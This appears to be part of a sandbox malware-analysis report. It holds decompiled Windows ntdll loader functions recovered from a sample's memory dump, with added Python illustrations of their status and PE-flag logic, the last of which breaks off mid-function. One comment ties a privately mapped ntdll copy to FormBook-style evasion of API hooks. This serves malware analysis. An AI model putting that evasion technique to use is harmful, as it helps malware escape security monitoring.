                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                      								_t32 = _t32 + 8;
                                                      							}
                                                      						}
                                                      					}
                                                      					_t51 =  *0x1208464; // 0x75150110
                                                      					 *0x120b1e0(_t47, _t32,  &_v12);
                                                      					_t49 =  *_t51();
                                                      					if(_t49 >= 0) {
                                                      						L8:
                                                      						_t35 = _v12;
                                                      						if(_t35 != 0) {
                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                      								E01149B10( *((intOrPtr*)(_t48 + 0x48)));
                                                      								_t35 = _v12;
                                                      							}
                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      					if(_t49 != 0xc000008a) {
                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                      							if(_t49 != 0xc00000bb) {
                                                      								goto L8;
                                                      							}
                                                      						}
                                                      					}
                                                      					if(( *0x1205780 & 0x00000005) != 0) {
                                                      						_push(_t49);
                                                      						E01195510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                      						_t53 = _t53 + 0x1c;
                                                      					}
                                                      					_t49 = 0;
                                                      					goto L8;
                                                      				} else {
                                                      					goto L9;
                                                      				}
                                                      			}

                                                       Instruction addresses (the per-line side column of the E01148E00 listing above in the original report, detached by extraction; listed here in the original order):
                                                       0x01148e0f 0x01148e16 0x01148e19 0x01148e1b 0x01148e21 0x01148e7f 0x01148e85 0x01189354 0x0118936c 0x01189371
                                                       0x0118937b 0x01189381 0x01189381 0x0118937b 0x01148e9d 0x01148e9d 0x01148e29 0x01148e2c 0x01148e38 0x01148e3e
                                                       0x01148e43 0x01148eb5 0x01148eb9 0x011892aa 0x011892af 0x011892e8 0x011892e8 0x011892af 0x01148eb9 0x01148e45
                                                       0x01148e53 0x01148e5b 0x01148e5f 0x01148e78 0x01148e78 0x01148e7d 0x01148ec3 0x01148ecd 0x01148ed2 0x01148ed2
                                                       0x01148ec5 0x01148ec5 0x00000000 0x01148e7d 0x01148e67 0x01148ea4 0x0118931a 0x00000000 0x00000000 0x01189320
                                                       0x01148ea4 0x01148e70 0x01189325 0x01189340 0x01189345 0x01189345 0x01148e76 0x00000000 0x00000000 0x00000000 0x00000000

                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0118933B, 01189367
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01189357
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0118932A
                                                      • LdrpFindDllActivationContext, xrefs: 01189331, 0118935D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: 736816d5772d56787bac82cf7100a333fd40905c4b10be1c64d31a1607f2d170
                                                      • Instruction ID: 8e0e748017633225140d65e0ab82665cc007001187a30eca64b6870f5269d7d8
                                                      • Opcode Fuzzy Hash: 736816d5772d56787bac82cf7100a333fd40905c4b10be1c64d31a1607f2d170
                                                      • Instruction Fuzzy Hash: 04412931A003359FEB3EBA9CD84DA36B6A5AB40E48F06816DDA0477552E7709C808782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%
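
The E01148E00 listing above (its string references identify it as ntdll's LdrpFindDllActivationContext) hard-codes two decisions that a reader of the report otherwise has to decode by hand: the run of comparisons against 0x5c, 0x3f and 0x3a on the name buffer at offset 0x28 of the loader entry, which strips a leading "\??\X:\" NT prefix from the process image's own path before the manifest probe, and the chain of NTSTATUS constants that decides whether a failed probe is swallowed (status reset to 0, "Probing for the manifest" diagnostic) or kept (status returned, "Querying the active activation context failed" diagnostic). The Python below is an editor's illustration added to this page; it is not code from the Joe Sandbox report, from the sample, or from ntdll. The NTSTATUS names are taken from the public ntstatus.h table (the report only shows the numbers); `probe`, `is_image_entry`, `process_has_actctx` and `debug_flags` are assumed stand-ins for the indirect call made through the pointer at 0x1208464, the test `__ecx == *0x1207984`, the test on PEB+0x1f8 (ActivationContextData in the 32-bit PEB) and the flag byte at 0x1205780; the sample DLL paths are constructed.

```python
"""Decision logic from the E01148E00 listing (ntdll LdrpFindDllActivationContext).

Added illustration for this report page; not code from the Joe Sandbox report,
from the analysed sample or from ntdll. The probe callback and the keyword
parameters are assumed stand-ins for the indirect call through the pointer at
0x1208464, the loader-entry fields at offsets 0x18/0x28/0x48, the PEB+0x1f8
test and the debug-flag byte at 0x1205780.
"""
from typing import Callable, List, Optional, Tuple

# Numeric values are the ones compared in the listing; the symbolic names are
# added from the public ntstatus.h table.
STATUS_NOT_IMPLEMENTED = 0xC0000002
STATUS_NO_SUCH_FILE = 0xC000000F
STATUS_RESOURCE_DATA_NOT_FOUND = 0xC0000089
STATUS_RESOURCE_TYPE_NOT_FOUND = 0xC000008A
STATUS_RESOURCE_NAME_NOT_FOUND = 0xC000008B
STATUS_NOT_SUPPORTED = 0xC00000BB
STATUS_RESOURCE_LANG_NOT_FOUND = 0xC0000204

# The seven failures the listing treats as "this DLL has no manifest": logged
# only if (debug flags & 5), then _t49 is reset to 0 and the caller sees success.
NO_MANIFEST_STATUSES = frozenset({
    STATUS_RESOURCE_TYPE_NOT_FOUND, STATUS_RESOURCE_NAME_NOT_FOUND,
    STATUS_RESOURCE_DATA_NOT_FOUND, STATUS_NO_SUCH_FILE,
    STATUS_RESOURCE_LANG_NOT_FOUND, STATUS_NOT_IMPLEMENTED, STATUS_NOT_SUPPORTED,
})

PROBE_MSG = 'Probing for the manifest of DLL "%s" failed with status 0x%08x'
QUERY_MSG = 'Querying the active activation context failed with status 0x%08x'


def nt_success(status: int) -> bool:
    """NT_SUCCESS: the listing's `_t49 >= 0` applied to a signed 32-bit status."""
    return (status & 0x80000000) == 0


def strip_nt_prefix(name_utf16le: bytes) -> bytes:
    """The 0x5c/0x3f/0x3a comparisons on the name buffer at entry+0x28.

    Read as 16-bit units: offsets 0,2,4,6 must be '\\', '?', '?', '\\'; offset 8
    must be non-zero (the drive letter); offset 0xa must be ':' and 0xc '\\'.
    Only then is the pointer advanced 8 bytes, i.e. past the 4 characters "\\??\\".
    """
    units = [int.from_bytes(name_utf16le[i:i + 2], "little")
             for i in range(0, min(len(name_utf16le), 14), 2)]
    if len(units) < 7:
        return name_utf16le
    bs, qm, colon = 0x5C, 0x3F, 0x3A
    if (units[0] == bs and units[1] == qm and units[2] == qm and units[3] == bs
            and units[4] != 0 and units[5] == colon and units[6] == bs):
        return name_utf16le[8:]
    return name_utf16le


Probe = Callable[[bytes], Tuple[int, Optional[int]]]


def find_dll_activation_context(name_utf16le: bytes, probe: Probe, *,
                                is_image_entry: bool = False,
                                process_has_actctx: bool = False,
                                debug_flags: int = 0
                                ) -> Tuple[int, Optional[int], List[str]]:
    """Follow the listing's control flow; return (status, new handle, log lines).

    probe(name) models the indirect call that fills the out parameter _v12 and
    returns an NTSTATUS; is_image_entry models `__ecx == *0x1207984`;
    process_has_actctx models `PEB+0x1f8 != 0`; debug_flags models 0x1205780.
    """
    log: List[str] = []
    # Outer test: no probe at all when the process already has an activation
    # context and this is the image's own loader entry (goto L9 with _t49 == 0).
    if process_has_actctx and is_image_entry:
        return 0, None, log
    name = strip_nt_prefix(name_utf16le) if is_image_entry else name_utf16le
    status, handle = probe(name)
    if nt_success(status):
        # L8: a non-zero _v12 replaces the handle stored at entry+0x48.
        return status, handle, log
    if status in NO_MANIFEST_STATUSES:
        if debug_flags & 0x5:
            log.append(PROBE_MSG % (name.decode("utf-16-le"), status))
        return 0, handle, log          # _t49 = 0; goto L8
    # Any other failure keeps its status and reaches the L9 diagnostic; the
    # listing also executes int3 there when (debug_flags & 0x10), not modelled.
    if debug_flags & 0x3:
        log.append(QUERY_MSG % status)
    return status, handle, log
```

The seven-status allow-list is the part worth remembering when reading the loader's behaviour around a sample: a DLL with no embedded manifest produces STATUS_RESOURCE_TYPE_NOT_FOUND or one of its neighbours and is treated as success, whereas any other failure (an access-denied on the file, for instance) is preserved and surfaces through the "Querying the active activation context failed" diagnostic only when the debug flag bits are set.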

                                                      C-Code - Quality: 83%
                                                      			E01128794(void* __ecx) {
                                                      				signed int _v0;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				intOrPtr _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v40;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr* _t77;
                                                      				signed int _t80;
                                                      				signed char _t81;
                                                      				signed int _t87;
                                                      				signed int _t91;
                                                      				void* _t92;
                                                      				void* _t94;
                                                      				signed int _t95;
                                                      				signed int _t103;
                                                      				signed int _t105;
                                                      				signed int _t110;
                                                      				signed int _t118;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr _t122;
                                                      				signed int _t125;
                                                      				signed int _t129;
                                                      				signed int _t131;
                                                      				signed int _t134;
                                                      				signed int _t136;
                                                      				signed int _t143;
                                                      				signed int* _t147;
                                                      				signed int _t151;
                                                      				void* _t153;
                                                      				signed int* _t157;
                                                      				signed int _t159;
                                                      				signed int _t161;
                                                      				signed int _t166;
                                                      				signed int _t168;
                                                      
                                                      				_push(__ecx);
                                                      				_t153 = __ecx;
                                                      				_t159 = 0;
                                                      				_t121 = __ecx + 0x3c;
                                                      				if( *_t121 == 0) {
                                                      					L2:
                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                      							L6:
                                                      							if(E0112934A() != 0) {
                                                      								_t159 = E0119A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                      								__eflags = _t159;
                                                      								if(_t159 < 0) {
                                                      									_t81 =  *0x1205780; // 0x0
                                                      									__eflags = _t81 & 0x00000003;
                                                      									if((_t81 & 0x00000003) != 0) {
                                                      										_push(_t159);
                                                      										E01195510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                      										_t81 =  *0x1205780; // 0x0
                                                      									}
                                                      									__eflags = _t81 & 0x00000010;
                                                      									if((_t81 & 0x00000010) != 0) {
                                                      										asm("int3");
                                                      									}
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t159 = E0112849B(0, _t122, _t153, _t159, _t180);
                                                      							if(_t159 >= 0) {
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      						_t80 = _t159;
                                                      						goto L8;
                                                      					} else {
                                                      						_t125 = 0x13;
                                                      						asm("int 0x29");
                                                      						_push(0);
                                                      						_push(_t159);
                                                      						_t161 = _t125;
                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                      						_t143 = 0;
                                                      						_v40 = _t161;
                                                      						_t118 = 0;
                                                      						_push(_t153);
                                                      						__eflags = _t87;
                                                      						if(_t87 != 0) {
                                                      							_t118 = _t87 + 0x5d8;
                                                      							__eflags = _t118;
                                                      							if(_t118 == 0) {
                                                      								L46:
                                                      								_t118 = 0;
                                                      							} else {
                                                      								__eflags =  *(_t118 + 0x30);
                                                      								if( *(_t118 + 0x30) == 0) {
                                                      									goto L46;
                                                      								}
                                                      							}
                                                      						}
                                                      						_v32 = 0;
                                                      						_v28 = 0;
                                                      						_v16 = 0;
                                                      						_v20 = 0;
                                                      						_v12 = 0;
                                                      						__eflags = _t118;
                                                      						if(_t118 != 0) {
                                                      							__eflags = _t161;
                                                      							if(_t161 != 0) {
                                                      								__eflags =  *(_t118 + 8);
                                                      								if( *(_t118 + 8) == 0) {
                                                      									L22:
                                                      									_t143 = 1;
                                                      									__eflags = 1;
                                                      								} else {
                                                      									_t19 = _t118 + 0x40; // 0x40
                                                      									_t156 = _t19;
                                                      									E01128999(_t19,  &_v16);
                                                      									__eflags = _v0;
                                                      									if(_v0 != 0) {
                                                      										__eflags = _v0 - 1;
                                                      										if(_v0 != 1) {
                                                      											goto L22;
                                                      										} else {
                                                      											_t128 =  *(_t161 + 0x64);
                                                      											__eflags =  *(_t161 + 0x64);
                                                      											if( *(_t161 + 0x64) == 0) {
                                                      												goto L22;
                                                      											} else {
                                                      												E01128999(_t128,  &_v12);
                                                      												_t147 = _v12;
                                                      												_t91 = 0;
                                                      												__eflags = 0;
                                                      												_t129 =  *_t147;
                                                      												while(1) {
                                                      													__eflags =  *((intOrPtr*)(0x1205c60 + _t91 * 8)) - _t129;
                                                      													if( *((intOrPtr*)(0x1205c60 + _t91 * 8)) == _t129) {
                                                      														break;
                                                      													}
                                                      													_t91 = _t91 + 1;
                                                      													__eflags = _t91 - 5;
                                                      													if(_t91 < 5) {
                                                      														continue;
                                                      													} else {
                                                      														_t131 = 0;
                                                      														__eflags = 0;
                                                      													}
                                                      													L37:
                                                      													__eflags = _t131;
                                                      													if(_t131 != 0) {
                                                      														goto L22;
                                                      													} else {
                                                      														__eflags = _v16 - _t147;
                                                      														if(_v16 != _t147) {
                                                      															goto L22;
                                                      														} else {
                                                      															E01132280(_t92, 0x12086cc);
                                                      															_t94 = E011E9DFB( &_v20);
                                                      															__eflags = _t94 - 1;
                                                      															if(_t94 != 1) {
                                                      															}
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															 *_t118 =  *_t118 + 1;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															_t95 = E011461A0( &_v32);
                                                      															__eflags = _t95;
                                                      															if(_t95 != 0) {
                                                      																__eflags = _v32 | _v28;
                                                      																if((_v32 | _v28) != 0) {
                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                      																	_t134 = _t71;
                                                      																	goto L55;
                                                      																}
                                                      															}
                                                      															goto L30;
                                                      														}
                                                      													}
                                                      													goto L56;
                                                      												}
                                                      												_t92 = 0x1205c64 + _t91 * 8;
                                                      												asm("lock xadd [eax], ecx");
                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                      												goto L37;
                                                      											}
                                                      										}
                                                      										goto L56;
                                                      									} else {
                                                      										_t143 = E01128A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                      										__eflags = _t143;
                                                      										if(_t143 != 0) {
                                                      											_t157 = _v12;
                                                      											_t103 = 0;
                                                      											__eflags = 0;
                                                      											_t136 =  &(_t157[1]);
                                                      											 *(_t161 + 0x64) = _t136;
                                                      											_t151 =  *_t157;
                                                      											_v20 = _t136;
                                                      											while(1) {
                                                      												__eflags =  *((intOrPtr*)(0x1205c60 + _t103 * 8)) - _t151;
                                                      												if( *((intOrPtr*)(0x1205c60 + _t103 * 8)) == _t151) {
                                                      													break;
                                                      												}
                                                      												_t103 = _t103 + 1;
                                                      												__eflags = _t103 - 5;
                                                      												if(_t103 < 5) {
                                                      													continue;
                                                      												}
                                                      												L21:
                                                      												_t105 = E0115F380(_t136, 0x10f1184, 0x10);
                                                      												__eflags = _t105;
                                                      												if(_t105 != 0) {
                                                      													__eflags =  *_t157 -  *_v16;
                                                      													if( *_t157 >=  *_v16) {
                                                      														goto L22;
                                                      													} else {
                                                      														asm("cdq");
                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                      														asm("cdq");
                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                      														if(__eflags > 0) {
                                                      															L29:
                                                      															E01132280(_t108, 0x12086cc);
                                                      															 *_t118 =  *_t118 + 1;
                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                      															_t156 = _t42;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															_t110 = E011461A0( &_v32);
                                                      															__eflags = _t110;
                                                      															if(_t110 != 0) {
                                                      																__eflags = _v32 | _v28;
                                                      																if((_v32 | _v28) != 0) {
                                                      																	_t134 = _v20;
                                                      																	L55:
                                                      																	E011E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                      																}
                                                      															}
                                                      															L30:
                                                      															 *_t118 =  *_t118 + 1;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															E0112FFB0(_t118, _t156, 0x12086cc);
                                                      															goto L22;
                                                      														} else {
                                                      															if(__eflags < 0) {
                                                      																goto L22;
                                                      															} else {
                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                      																	goto L22;
                                                      																} else {
                                                      																	goto L29;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													goto L56;
                                                      												}
                                                      												goto L22;
                                                      											}
                                                      											asm("lock inc dword [eax]");
                                                      											goto L21;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						return _t143;
                                                      					}
                                                      				} else {
                                                      					_push( &_v8);
                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                      					_push(__ecx + 0x40);
                                                      					_push(_t121);
                                                      					_push(0xffffffff);
                                                      					_t80 = E01159A00();
                                                      					_t159 = _t80;
                                                      					if(_t159 < 0) {
                                                      						L8:
                                                      						return _t80;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				L56:
			}

                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01179C28
                                                      • LdrpDoPostSnapWork, xrefs: 01179C1E
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01179C18
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 2994545307-1948996284
                                                      • Opcode ID: b2d9d45a4f9b9ec1c8964a47b48d0391fbc0da4aee3ec860dd38e7fdae58df3f
                                                      • Instruction ID: 66ab2d262e5fc4359e2a6185a91f082f5e63b524506526e52036138d3ab67407
                                                      • Opcode Fuzzy Hash: b2d9d45a4f9b9ec1c8964a47b48d0391fbc0da4aee3ec860dd38e7fdae58df3f
                                                      • Instruction Fuzzy Hash: A3915631A0022ADFEF1CDF58D880ABA77F5FF94318B054169EA01AB241E770ED21CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                       			// Decompiler output from the report for a function recovered from the memory region
                                                       			// dumped at 0x010F0000 in process 0x15. The strings it references
                                                       			// ("minkernel\ntdll\ldrmap.c", "LdrpCompleteMapModule") identify it as ntdll's
                                                       			// LdrpCompleteMapModule, i.e. Windows loader code rather than sample-specific logic;
                                                       			// the decompiler names (E........) are kept so they match the rest of the report.
                                                       			// 0x010F0000 is not the base at which the system ntdll is normally mapped in a 32-bit
                                                       			// process; a second, privately mapped copy of ntdll is consistent with the sample
                                                       			// getting past user-mode API hooks, a behaviour known from FormBook.
                                                       			// Offsets below follow the public 32-bit layouts:
                                                       			//   __ecx        load context; +0x20 is the LDR_DATA_TABLE_ENTRY of the new module
                                                       			//   __edx        IMAGE_NT_HEADERS: +0x16 FileHeader.Characteristics,
                                                       			//                +0x5e OptionalHeader.DllCharacteristics
                                                       			//   _a4          NTSTATUS returned by the mapping step
                                                       			//   entry+0x18   DllBase, +0x24 FullDllName (UNICODE_STRING), +0x34 Flags,
                                                       			//                +0x5c LoadContext
                                                       			//   *[fs:0x30]   PEB; +0x240 TracingFlags (bit 2 = LibLoaderTracingEnabled)
                                                       			E01127E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                       				char _v8;
                                                       				intOrPtr _v12;
                                                       				intOrPtr _v16;
                                                       				intOrPtr _v20;
                                                       				char _v24;
                                                       				signed int _t73;
                                                       				void* _t77;
                                                       				char* _t82;
                                                       				char* _t87;
                                                       				signed char* _t97;
                                                       				signed char _t102;
                                                       				intOrPtr _t107;
                                                       				signed char* _t108;
                                                       				intOrPtr _t112;
                                                       				intOrPtr _t124;
                                                       				intOrPtr _t125;
                                                       				intOrPtr _t126;
                                                       
                                                       				_t107 = __edx;                                       // IMAGE_NT_HEADERS
                                                       				_v12 = __ecx;                                        // load context
                                                       				_t125 =  *((intOrPtr*)(__ecx + 0x20));               // LDR_DATA_TABLE_ENTRY
                                                       				_t124 = 0;                                           // NTSTATUS to return
                                                       				_v20 = __edx;
                                                       				// Data directory 0xe (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR) of DllBase:
                                                       				// a non-NULL result (_v8) means the module is a CLR image.
                                                       				if(E0112CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                       					_t112 = _v8;
                                                       				} else {
                                                       					_t112 = 0;
                                                       					_v8 = 0;
                                                       				}
                                                       				if(_t112 != 0) {
                                                       					// A context flag forbids CLR images here: STATUS_INVALID_IMAGE_FORMAT.
                                                       					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                       						_t124 = 0xc000007b;
                                                       						goto L8;
                                                       					}
                                                       					_t73 =  *(_t125 + 0x34) | 0x00400000;              // Flags |= LDRP_COR_IMAGE
                                                       					 *(_t125 + 0x34) = _t73;
                                                       					// IMAGE_COR20_HEADER.Flags (offset 0x10) & COMIMAGE_FLAGS_ILONLY
                                                       					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                       						goto L3;
                                                       					}
                                                       					 *(_t125 + 0x34) = _t73 | 0x01000000;              // Flags |= LDRP_COR_IL_ONLY
                                                       					_t124 = E0111C9A4( *((intOrPtr*)(_t125 + 0x18)));  // further CLR-image handling on DllBase
                                                       					if(_t124 < 0) {
                                                       						goto L8;
                                                       					} else {
                                                       						goto L3;
                                                       					}
                                                       				} else {
                                                       					L3:
                                                       					// FileHeader.Characteristics & IMAGE_FILE_DLL: a non-DLL only loses
                                                       					// LDRP_IMAGE_DLL (0x4) and the function is done.
                                                       					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                       						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                       						L8:
                                                       						return _t124;
                                                       					}
                                                       					// Signature policy bit in the entry's load context versus the image's
                                                       					// IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY (0x80) bit: a DLL that does not
                                                       					// opt into integrity checks, loaded where policy demands them, is rejected.
                                                       					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                       						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                       							goto L5;
                                                       						}
                                                       						_t102 =  *0x1205780; // 0x0                    loader debug-flag global
                                                       						if((_t102 & 0x00000003) != 0) {
                                                       							// loader debug print: source file, line 0x363, function, level, format, &FullDllName
                                                       							E01195510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                       							_t102 =  *0x1205780; // 0x0
                                                       						}
                                                       						if((_t102 & 0x00000010) != 0) {
                                                       							asm("int3");                                  // break into the debugger when requested
                                                       						}
                                                       						_t124 = 0xc0000428;                               // STATUS_INVALID_IMAGE_HASH
                                                       						goto L8;
                                                       					}
                                                       					L5:
                                                       					if(( *(_t125 + 0x34) & 0x01000000) != 0) {          // IL-only images are never relocated here
                                                       						goto L8;
                                                       					}
                                                       					// 0x40000003 = STATUS_IMAGE_NOT_AT_BASE, 0x40000003 + 0x33 = 0x40000036 =
                                                       					// STATUS_IMAGE_AT_DIFFERENT_BASE; any other mapping status returns at once.
                                                       					_t77 = _a4 - 0x40000003;
                                                       					if(_t77 == 0 || _t77 == 0x33) {
                                                       						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                       						// Locate the tracing-flag byte: KUSER_SHARED_DATA (0x7ffe0384) or an
                                                       						// alternate copy reached through PEB+0x50 when E01137D50() says so.
                                                       						if(E01137D50() != 0) {
                                                       							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                       						} else {
                                                       							_t82 = 0x7ffe0384;
                                                       						}
                                                       						_t108 = 0x7ffe0385;
                                                       						// Emit loader trace event 0x1490 only if the shared tracing flag,
                                                       						// PEB.TracingFlags bit 2 (LibLoaderTracingEnabled) and bit 0x20 of the
                                                       						// following byte are all set.
                                                       						if( *_t82 != 0) {
                                                       							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                       								if(E01137D50() == 0) {
                                                       									_t97 = 0x7ffe0385;
                                                       								} else {
                                                       									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                       								}
                                                       								if(( *_t97 & 0x00000020) != 0) {
                                                       									E01197016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                       								}
                                                       							}
                                                       						}
                                                       						if(_a4 != 0x40000003) {
                                                       							L14:
                                                       							// Second trace event (0x1491), same gating as above, after relocation.
                                                       							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                       							if(E01137D50() != 0) {
                                                       								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                       							} else {
                                                       								_t87 = 0x7ffe0384;
                                                       							}
                                                       							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                       								if(E01137D50() != 0) {
                                                       									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                       								}
                                                       								if(( *_t108 & 0x00000020) != 0) {
                                                       									E01197016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                       								}
                                                       							}
                                                       							goto L8;
                                                       						} else {
                                                       							_v16 = _t125 + 0x24;                          // &FullDllName, for the failure log
                                                       							// STATUS_IMAGE_NOT_AT_BASE: the image landed away from its preferred base,
                                                       							// so the loader applies the base relocations itself.
                                                       							_t124 = E0114A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                       							if(_t124 < 0) {
                                                       								E0111B1E1(_t124, 0x1490, 0, _v16);        // log the relocation failure
                                                       								goto L8;
                                                       							}
                                                       							goto L14;
                                                       						}
                                                       					} else {
                                                       						goto L8;
                                                       					}
                                                       				}
                                                       			}
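The branches of the decompiled function above, replayed in Python as an added example (not code from the report, from ntdll or from the sample) so the checks can be run offline against a constructed PE. Field offsets come from the public PE format and match what the listing reads through __edx (+0x16 Characteristics, +0x5e DllCharacteristics, data directory 0xe); the LDRP_* constants are the documented loader flags it ORs into LDR_DATA_TABLE_ENTRY.Flags. The two context bits it tests (`*(ctx+0x10) & 0x800000` and `*(*(entry+0x5c)+0x10) & 0x80`) are modelled as the booleans `forbid_clr` and `require_signed` because their owning structures are not visible in the excerpt; `build_sample_pe` assembles a minimal, constructed PE32 image for the demonstration.

```python
import struct

IMAGE_FILE_DLL = 0x2000                        # FileHeader.Characteristics, read at nt+0x16
IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY = 0x0080  # OptionalHeader.DllCharacteristics, nt+0x5e
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14      # the 0xe passed to E0112CEE4 in the listing
COMIMAGE_FLAGS_ILONLY = 0x1                    # IMAGE_COR20_HEADER.Flags (offset 0x10)
LDRP_IMAGE_DLL = 0x00000004
LDRP_COR_IMAGE = 0x00400000
LDRP_COR_IL_ONLY = 0x01000000

STATUS_SUCCESS = 0x00000000
STATUS_IMAGE_NOT_AT_BASE = 0x40000003          # loader must apply relocations itself
STATUS_IMAGE_AT_DIFFERENT_BASE = 0x40000036    # 0x40000003 + 0x33: fix-ups already done
STATUS_INVALID_IMAGE_FORMAT = 0xC000007B
STATUS_INVALID_IMAGE_HASH = 0xC0000428


def _nt_headers(data):
    return struct.unpack_from("<I", data, 0x3C)[0]


def _directory(data, idx):
    """(rva, size) of data directory idx, or (0, 0) if absent; handles PE32 and PE32+."""
    opt = _nt_headers(data) + 0x18
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs = opt + (0x60 if magic == 0x10B else 0x70)
    count = struct.unpack_from("<I", data, dirs - 4)[0]  # NumberOfRvaAndSizes
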